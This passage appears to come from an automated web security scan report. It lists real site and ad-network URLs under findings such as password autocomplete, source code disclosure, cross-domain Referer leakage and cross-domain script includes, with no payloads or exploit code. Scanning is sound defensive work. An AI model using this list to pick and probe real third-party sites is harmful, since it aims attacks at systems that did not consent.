13.64. http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.65. http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.66. http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.67. http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.68. http://ads.revsci.net/adserver/ako

13.69. http://ads.undertone.com/f

13.70. http://ak1.abmr.net/is/adopt.imiclk.com

13.71. http://ak1.abmr.net/is/tag.admeld.com

13.72. http://ak1.abmr.net/is/www.burstnet.com

13.73. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1

13.74. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11

13.75. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php

13.76. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php

13.77. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php

13.78. http://api.bizographics.com/v1/profile.redirect

13.79. http://api.twitter.com/1/FanSided/lists//statuses.json

13.80. http://apr.lijit.com///www/delivery/ajs.php

13.81. http://ar.voicefive.com/b/recruitBeacon.pli

13.82. http://ar.voicefive.com/b/recruitBeacon.pli

13.83. http://ar.voicefive.com/b/wc_beacon.pli

13.84. http://ar.voicefive.com/bmx3/broker.pli

13.85. http://at.amgdgt.com/ads/

13.86. http://b.scorecardresearch.com/b

13.87. http://b.scorecardresearch.com/p

13.88. http://b.scorecardresearch.com/r

13.89. http://b.voicefive.com/b

13.90. http://b.voicefive.com/p

13.91. http://beacon.dmsinsights.com/beacon/1103771/2

13.92. http://bh.contextweb.com/bh/rtset

13.93. http://bpx.a9.com/ads/getad

13.94. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.95. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.96. http://btg.mtvnservices.com/aria/guid.html

13.97. http://ce.lijit.com/merge

13.98. http://cm.npc-lee.overture.com/js_1_0/

13.99. http://csc.beap.ad.yieldmanager.net/i

13.100. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM

13.101. http://d.adroll.com/view/7e0e346171a4d3507190678e09366eb4

13.102. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

13.103. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

13.104. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

13.105. http://d.chango.com/collector/admeldpixel

13.106. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

13.107. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

13.108. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

13.109. http://d.xp1.ru4.com/meta

13.110. http://d.xp1.ru4.com/meta

13.111. http://d1.openx.org/lg.php

13.112. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js

13.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js

13.114. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js

13.115. http://d7.zedo.com/img/bh.gif

13.116. http://gdyn.nba.com/1.1/1.gif

13.117. http://glam.grapeshot.co.uk/main/redirect.cgi

13.118. http://image2.pubmatic.com/AdServer/Pug

13.119. http://img137.imageshack.us/img137/4291/d5zee1.jpg

13.120. http://img690.imageshack.us/img690/7868/umadbroz.jpg

13.121. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png

13.122. http://imp.constantcontact.com/imp/cmp.jsp

13.123. http://js.revsci.net/gateway/gw.js

13.124. http://load.exelator.com/load/

13.125. http://m.xp1.ru4.com/meta

13.126. http://media.fastclick.net/w/tre

13.127. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

13.128. http://my.yahoo.com/e/df

13.129. http://my.yahoo.com/e/js

13.130. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1

13.131. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1

13.132. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1

13.133. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js

13.134. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js

13.135. http://ox-d.sbnation.com/w/1.0/ajs

13.136. http://p.brilig.com/contact/bct

13.137. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js

13.138. http://pix04.revsci.net/D10889/a1/0/3/0.gif

13.139. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js

13.140. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js

13.141. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js

13.142. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

13.143. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif

13.144. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js

13.145. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js

13.146. http://pixel.invitemedia.com/data_sync

13.147. http://pixel.quantserve.com/pixel

13.148. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

13.149. http://pixel.rubiconproject.com/di.php

13.150. http://pixel.rubiconproject.com/tap.php

13.151. http://r.openx.net/set

13.152. http://r.turn.com/r/bd

13.153. http://r.turn.com/r/beacon

13.154. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

13.155. http://rs.gwallet.com/r1/pixel/x420r9190030

13.156. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583

13.157. http://segments.adap.tv/data/

13.158. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

13.159. http://server.cpmstar.com/brilig.aspx

13.160. http://services.krxd.net/geoip

13.161. http://services.krxd.net/pixel.gif

13.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.163. http://sis.amazon.com/iu

13.164. http://srv.clickfuse.com/pixels/delete.php

13.165. http://stgapi.choicestream.com/instr/csanywhere.js

13.166. http://sync.adap.tv/sync

13.167. http://sync.mathtag.com/sync

13.168. http://syndication.mmismm.com/tntwo.php

13.169. http://t.invitemedia.com/track_imp

13.170. http://tag.admeld.com/ad/js/195/fsv/728x90/ros

13.171. http://tags.bluekai.com/site/2312

13.172. http://tags.bluekai.com/site/2731

13.173. http://tags.bluekai.com/site/2736

13.174. http://tags.bluekai.com/site/3113

13.175. http://tags.bluekai.com/site/353

13.176. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.177. http://tap.rubiconproject.com/oz/sensor

13.178. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

13.179. http://tiger.vizu.com/a.gif

13.180. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530

13.181. http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif

13.182. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp

13.183. http://u.openx.net/w/1.0/sc

13.184. http://vap3den1.lijit.com/www/delivery/lg.php

13.185. http://viacom.adbureau.net/LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

13.186. http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

13.187. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979

13.188. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058

13.189. http://vt.imiclk.com/cgi/vtc.cgi

13.190. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

13.191. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

13.192. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

13.193. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

13.194. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

13.195. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

13.196. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

13.197. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

13.198. http://www.expedia.com/hotel.h892034.Hotel-Information

13.199. http://www.googleadservices.com/pagead/aclk

13.200. http://www.imdb.com/title/tt0944947/

13.201. http://www.lijit.com/beacon

13.202. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx

13.203. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction

13.204. http://www.wtp101.com/admeld_sync

13.205. http://www.wtp101.com/cox_sync

13.206. http://www22.glam.com/cTagsImgCmd.act

14. Password field with autocomplete enabled

14.1. https://login.yahoo.com/config/login_verify2

14.2. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

14.3. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

14.4. http://www.mavsmoneyball.com/fanposts

14.5. http://www.mavsmoneyball.com/mavericks-tickets

14.6. http://www.nba.com/mavericks/index_main.html

14.7. http://www.nba.com/mavericks/index_main.html

15. Source code disclosure

15.1. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

15.2. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

15.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

15.4. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

16. Referer-dependent response

16.1. http://ad.yieldmanager.com/imp

16.2. http://adnxs.revsci.net/imp

16.3. http://ads.adbrite.com/adserver/vdi/742697

16.4. http://api.twitter.com/1/FanSided/lists//statuses.json

16.5. http://tag.admeld.com/ad/js/195/fsv/728x90/ros

16.6. http://www.apture.com/js/apture.js

16.7. http://www.expedia.com/hotel.h892034.Hotel-Information

16.8. http://www.facebook.com/extern/login_status.php

16.9. http://www.facebook.com/plugins/activity.php

16.10. http://www.facebook.com/plugins/like.php

16.11. http://www.facebook.com/plugins/likebox.php

16.12. http://www.facebook.com/widgets/like.php

17. Cross-domain POST

17.1. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/

17.2. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

17.3. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

17.4. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

17.5. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

17.6. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

17.7. http://www.mavsmoneyball.com/fanposts

17.8. http://www.mavsmoneyball.com/fanposts

17.9. http://www.mavsmoneyball.com/mavericks-tickets

17.10. http://www.mavsmoneyball.com/mavericks-tickets

17.11. http://www.nba.com/mavericks/index_main.html

17.12. http://www.nba.com/mavericks/index_main.html

18. Cross-domain Referer leakage

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.amgdgt.com/ads/

18.4. http://ad.amgdgt.com/ads/

18.5. http://ad.amgdgt.com/ads/

18.6. http://ad.amgdgt.com/ads/

18.7. http://ad.amgdgt.com/ads/

18.8. http://ad.amgdgt.com/ads/

18.9. http://ad.amgdgt.com/ads/

18.10. http://ad.amgdgt.com/ads/

18.11. http://ad.amgdgt.com/ads/

18.12. http://ad.amgdgt.com/ads/

18.13. http://ad.amgdgt.com/ads/

18.14. http://ad.amgdgt.com/ads/

18.15. http://ad.amgdgt.com/ads/

18.16. http://ad.amgdgt.com/ads/

18.17. http://ad.amgdgt.com/ads/

18.18. http://ad.amgdgt.com/ads/

18.19. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925

18.20. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

18.21. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

18.22. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

18.23. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

18.24. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

18.25. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.26. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

18.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

18.30. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

18.31. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

18.32. http://ad.doubleclick.net/adi/amzn.us.audienceextension/

18.33. http://ad.doubleclick.net/adi/x1.dt/dt2

18.34. http://ad.doubleclick.net/adi/x1.dt/dt2

18.35. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

18.36. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

18.37. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

18.38. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.2

18.39. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.3

18.40. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

18.41. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.42. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.43. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.44. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.45. http://ad.doubleclick.net/adj/fansided.fsv/ros

18.46. http://ad.doubleclick.net/adj/gm.kotaku/e3

18.47. http://ad.doubleclick.net/adj/gm.kotaku/pax

18.48. http://ad.doubleclick.net/adj/gm.kotaku/threeDS

18.49. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

18.50. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

18.51. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90

18.52. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90

18.53. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon

18.54. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.55. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon

18.56. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.57. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.58. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.59. http://ad.doubleclick.net/adj/team_sites.dart/global_nav

18.60. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index

18.61. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index

18.62. http://ad.turn.com/server/ads.js

18.63. http://ad.turn.com/server/ads.js

18.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

18.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131

18.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

18.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

18.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

18.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

18.70. http://ad.yieldmanager.com/iframe3

18.71. http://ad.yieldmanager.com/iframe3

18.72. http://ad.yieldmanager.com/iframe3

18.73. http://ad.yieldmanager.com/pixel

18.74. http://ad.yieldmanager.com/v0/admeld-match

18.75. http://adadvisor.net/adscores/g.js

18.76. http://admeld-match.dotomi.com/admeld/match

18.77. http://admeld.adnxs.com/usersync

18.78. http://admeld.lucidmedia.com/clicksense/admeld/match

18.79. http://admin.brightcove.com/js/BrightcoveExperiences.js

18.80. http://adopt.imiclk.com/emb/q

18.81. http://adopt.imiclk.com/emb/q

18.82. http://ads.bluelithium.com/st

18.83. http://ads.tw.adsonar.com/adserving/getAds.jsp

18.84. http://adserv.impactengine.com/www/7u/8t/1p/2b/objembed.html

18.85. http://adserv.impactengine.com/www/8i/8j/9q/km/objembed.html

18.86. http://adserv.impactengine.com/www/j8/4t/w4/uf/objembed.html/@@1305142019@@

18.87. http://adserv.impactengine.com/www/l3/df/ey/qw/objembed.html/@@1302711674@@

18.88. http://adserver.veruta.com/cookiematch.fcgi

18.89. http://api.twitter.com/1/FanSided/lists//statuses.json

18.90. http://apps.conduit-banners.com/Twackle-Twackle_Sports

18.91. http://as.jivox.com/player/iabplayer.php

18.92. http://as.jivox.com/player/iabplayer.php

18.93. http://as.jivox.com/player/jivox_ad_tags.php

18.94. http://as.jivox.com/player/jivox_ad_tags.php

18.95. http://bidnw.ru4.com/nf

18.96. http://bidnw.ru4.com/nf

18.97. http://bn.xp1.ru4.com/nf

18.98. http://bp.specificclick.net/

18.99. http://bpx.a9.com/ads/getad

18.100. http://bpx.a9.com/ads/render

18.101. http://cdn.extensions.buzznet.com/topscript.js.php

18.102. http://cim.meebo.com/cim

18.103. http://cm.g.doubleclick.net/pixel

18.104. http://cm.g.doubleclick.net/pixel

18.105. http://cm.g.doubleclick.net/pixel

18.106. http://cm.g.doubleclick.net/pixel

18.107. http://cm.npc-lee.overture.com/js_1_0/

18.108. http://cms.ad.yieldmanager.net/v1/cms

18.109. http://creativeby1.unicast.com/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js

18.110. http://dg.specificclick.net/

18.111. http://fls.doubleclick.net/activityi

18.112. http://fls.doubleclick.net/activityi

18.113. http://fls.doubleclick.net/activityi

18.114. http://googleads.g.doubleclick.net/pagead/ads

18.115. http://googleads.g.doubleclick.net/pagead/ads

18.116. http://googleads.g.doubleclick.net/pagead/ads

18.117. http://googleads.g.doubleclick.net/pagead/ads

18.118. http://googleads.g.doubleclick.net/pagead/ads

18.119. http://googleads.g.doubleclick.net/pagead/ads

18.120. http://googleads.g.doubleclick.net/pagead/ads

18.121. http://googleads.g.doubleclick.net/pagead/ads

18.122. http://googleads.g.doubleclick.net/pagead/ads

18.123. http://googleads.g.doubleclick.net/pagead/ads

18.124. http://googleads.g.doubleclick.net/pagead/ads

18.125. http://googleads.g.doubleclick.net/pagead/ads

18.126. http://googleads.g.doubleclick.net/pagead/ads

18.127. http://googleads.g.doubleclick.net/pagead/ads

18.128. http://googleads.g.doubleclick.net/pagead/ads

18.129. http://googleads.g.doubleclick.net/pagead/ads

18.130. http://googleads.g.doubleclick.net/pagead/ads

18.131. http://googleads.g.doubleclick.net/pagead/ads

18.132. http://googleads.g.doubleclick.net/pagead/ads

18.133. http://googleads.g.doubleclick.net/pagead/ads

18.134. http://googleads.g.doubleclick.net/pagead/ads

18.135. http://googleads.g.doubleclick.net/pagead/ads

18.136. http://googleads.g.doubleclick.net/pagead/ads

18.137. http://googleads.g.doubleclick.net/pagead/ads

18.138. http://googleads.g.doubleclick.net/pagead/ads

18.139. http://googleads.g.doubleclick.net/pagead/ads

18.140. http://googleads.g.doubleclick.net/pagead/ads

18.141. http://googleads.g.doubleclick.net/pagead/ads

18.142. http://googleads.g.doubleclick.net/pagead/ads

18.143. http://googleads.g.doubleclick.net/pagead/ads

18.144. http://googleads.g.doubleclick.net/pagead/ads

18.145. http://googleads.g.doubleclick.net/pagead/ads

18.146. http://googleads.g.doubleclick.net/pagead/ads

18.147. http://googleads.g.doubleclick.net/pagead/ads

18.148. http://googleads.g.doubleclick.net/pagead/ads

18.149. http://googleads.g.doubleclick.net/pagead/ads

18.150. http://googleads.g.doubleclick.net/pagead/ads

18.151. http://googleads.g.doubleclick.net/pagead/ads

18.152. http://googleads.g.doubleclick.net/pagead/ads

18.153. http://googleads.g.doubleclick.net/pagead/ads

18.154. http://googleads.g.doubleclick.net/pagead/ads

18.155. http://googleads.g.doubleclick.net/pagead/ads

18.156. http://googleads.g.doubleclick.net/pagead/ads

18.157. http://googleads.g.doubleclick.net/pagead/ads

18.158. http://googleads.g.doubleclick.net/pagead/ads

18.159. http://googleads.g.doubleclick.net/pagead/ads

18.160. http://googleads.g.doubleclick.net/pagead/ads

18.161. http://googleads.g.doubleclick.net/pagead/ads

18.162. http://googleads.g.doubleclick.net/pagead/ads

18.163. http://googleads.g.doubleclick.net/pagead/ads

18.164. http://googleads.g.doubleclick.net/pagead/ads

18.165. http://googleads.g.doubleclick.net/pagead/ads

18.166. http://googleads.g.doubleclick.net/pagead/ads

18.167. http://googleads.g.doubleclick.net/pagead/ads

18.168. http://ib.adnxs.com/ab

18.169. http://ib.adnxs.com/ab

18.170. http://ib.adnxs.com/ab

18.171. http://ib.adnxs.com/ptj

18.172. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

18.173. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/articles.js

18.174. http://k.collective-media.net/cmadj/cm.mtv/ent_010111

18.175. http://kotaku.com/static/ad_iframe.php

18.176. http://kotaku.com/static/ad_iframe.php

18.177. http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js

18.178. http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js

18.179. http://l.yimg.com/zz/combo

18.180. http://load.exelator.com/load/

18.181. https://login.yahoo.com/config/login_verify2

18.182. http://mediacdn.disqus.com/1307735099/build/system/disqus.js

18.183. http://my.yahoo.com/darla/fc.php

18.184. http://my.yahoo.com/darla/fc.php

18.185. http://my.yahoo.com/darla/fc.php

18.186. http://my.yahoo.com/darla/fc.php

18.187. http://my.yahoo.com/darla/fc.php

18.188. http://my.yahoo.com/darla/fc.php

18.189. http://my.yahoo.com/darla/fc.php

18.190. http://my.yahoo.com/darla/fc.php

18.191. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros

18.192. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros

18.193. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06

18.194. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left

18.195. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2

18.196. http://open.ad.yieldmanager.net/a1

18.197. http://open.ad.yieldmanager.net/a1

18.198. http://pagead2.googlesyndication.com/pagead/ads

18.199. http://pagead2.googlesyndication.com/pagead/ads

18.200. http://pixel.invitemedia.com/admeld_sync

18.201. http://pixel.invitemedia.com/admeld_sync

18.202. http://platform0.twitter.com/widgets/follow_button.html

18.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

18.204. http://sports.yahoo.com/nba/expertsarchive

18.205. http://sports.yahoo.com/nba/news

18.206. http://sports.yahoo.com/nba/news

18.207. http://sports.yahoo.com/nba/news

18.208. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js

18.209. http://um.simpli.fi/am_js.js

18.210. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

18.211. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

18.212. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

18.213. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

18.214. http://www.facebook.com/plugins/activity.php

18.215. http://www.facebook.com/plugins/comments.php

18.216. http://www.facebook.com/plugins/like.php

18.217. http://www.facebook.com/plugins/likebox.php

18.218. http://www.facebook.com/plugins/likebox.php

18.219. http://www.facebook.com/plugins/likebox.php

18.220. http://www.facebook.com/plugins/likebox.php

18.221. http://www.facebook.com/plugins/likebox.php

18.222. http://www.facebook.com/plugins/likebox.php

18.223. http://www.facebook.com/plugins/recommendations.php

18.224. http://www.facebook.com/widgets/like.php

18.225. http://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg

18.226. http://www.google.com/trends/hottrends

18.227. http://www.google.com/trends/hottrends

18.228. http://www.google.com/trends/hottrends

18.229. http://www.google.com/trends/hottrends

18.230. http://www.nba.com/video/cvp/teamarticleplayer.html

18.231. http://www.paperg.com/jsfb/embed.php

18.232. http://www.stumbleupon.com/badge/embed/5/

18.233. http://www.ugo.com/cm/ugo/js/ugo-global.js

18.234. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

19. Cross-domain script include

19.1. http://ad.amgdgt.com/ads/

19.2. http://ad.amgdgt.com/ads/

19.3. http://ad.amgdgt.com/ads/

19.4. http://ad.amgdgt.com/ads/

19.5. http://ad.amgdgt.com/ads/

19.6. http://ad.amgdgt.com/ads/

19.7. http://ad.amgdgt.com/ads/

19.8. http://ad.amgdgt.com/ads/

19.9. http://ad.amgdgt.com/ads/

19.10. http://ad.amgdgt.com/ads/

19.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

19.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

19.13. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

19.14. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

19.15. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

19.16. http://ad.doubleclick.net/adi/x1.dt/dt2

19.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

19.18. http://ad.doubleclick.net/adj/fansided.fsv/ros

19.19. http://adopt.imiclk.com/emb/q

19.20. http://adopt.imiclk.com/emb/q

19.21. http://bidnw.ru4.com/nf

19.22. http://bidnw.ru4.com/nf

19.23. http://bn.xp1.ru4.com/nf

19.24. http://cdn.triggertag.gorillanation.com/js/triggertag.js

19.25. http://fansided.com/category/nba/

19.26. http://fls.doubleclick.net/activityi

19.27. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

